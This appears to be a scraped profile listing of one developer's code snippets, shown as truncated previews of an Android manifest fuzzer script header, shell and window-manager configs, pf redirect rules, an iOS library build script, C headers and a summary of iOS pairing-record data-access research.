dweinstein

#!/bin/bash
#Basic set up for an Application AndroidManifest Fuzzer
#this requires a preexisting ant buildable application project to be set up! so get the SDK and ant1.8
#this file reproduces the bug mentioned here http://ibrahimbalic.com/2014/android-os-memory-corruption-bug/
#NOTE: values from 260000 and up cause SIGSEGvs to be sent to the system_server (test on KitKat 4.4.2)
#NOTE: you should probably monitor $(adb logcat)||(/system/bin/gdbserver) for responsiveness to the issue

APP_PROJ_DIR="..." #<-- PATH TO PROJ DIR
APP_PACKAGE_NAME="..." #<-- PACKAGE NAME
APP_LAUNCH_COMP="..." # <--- MAIN ACTIVITY NAME

dweinstein

Health

Has CI

Tests pass

Total number of breaking commits

Number of dependencies

Average age of issue

Frequency of issues fixed

Average response time of issues fixed to bugs filed

Last commit

dweinstein

# vim:ft=zsh ts=2 sw=2 sts=2
#
# agnoster's Theme - https://gist.github.com/3712874
# A Powerline-inspired theme for ZSH
#
# # README
#
# In order for this theme to render correctly, you will need a
# [Powerline-patched font](https://github.com/Lokaltog/powerline-fonts).
#

dweinstein

# GLOBAL CONFIGURATIONS
# -------------------------------------------------------------------
# See https://github.com/jigish/slate/wiki/Global-Configs

config defaultToCurrentScreen true
config secondsBeforeRepeat 0.4
config secondsBetweenRepeat 0.1
config keyboardLayout "qwerty"
config nudgePercentOf screenSize
config resizePercentOf screenSize

dweinstein

Add the following to /etc/pf.anchors/myname:

rdr pass on lo0 inet proto tcp from any to any port 80 -> 127.0.0.1 port 4000
rdr pass on lo0 inet proto tcp from any to any port 443 -> 127.0.0.1 port 4001

Add the following to /etc/pf-myname.conf:

rdr-anchor "forwarding"
load anchor "forwarding" from "/etc/pf.anchors/myname"

dweinstein

#!/bin/bash
set -u
 
# Setup architectures, library name and other vars + cleanup from previous runs
ARCHS=("armv7" "armv7s" "i386")
SDKS=("iphoneos" "iphoneos" "macosx")
LIB_NAME="libevent-2.0.21-stable"

TEMP_DIR="$(pwd)/tmp"
TEMP_LIB_PATH="$(pwd)/tmp/${LIB_NAME}"

dweinstein

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
  char buffer[1024];

dweinstein

/*
 *  SEP firmware split tool
 *
 *  Copyright (c) 2017 xerub
 */

#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

dweinstein

TL;DR

• Pairing an iOS device to a host (computer running iTunes) gives that host significant access to data on the iOS device and requires connecting the unlocked iOS device to a host over USB
• Once paired, that host (or another host that has stolen its pairing record) can access significant amounts of user personal data from the iOS device over USB and Wi-Fi through the com.apple.mobile.file_relay and com.apple.mobile.house_arrest lockdown services
• These services will not return user data files that are encrypted and locked by iOS Data Protection but the files returned by file_relay are not protected by iOS Data Protection and do include significant amounts of personal user data that would otherwise be encrypted in iTunes encrypted backups ("Encrypt Backup" is enabled)
• The com.apple.mobile.file_relay service is not used or referenced by any public Apple software so its intended client software is unknown outside of Apple
• Apple released a [Knowledge Base article](https://support.apple.co

dweinstein

// Start repl with:
// $ xcrun swift -F xcrun swift -F /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/Library/Frameworks/

// Or run as script:
// $ xcrun swift -F xcrun swift -F /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/Library/Frameworks/ %


import Foundation

if dlopen("/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/Library/Frameworks/XCTest.framework/XCTest", RTLD_NOW) == nil {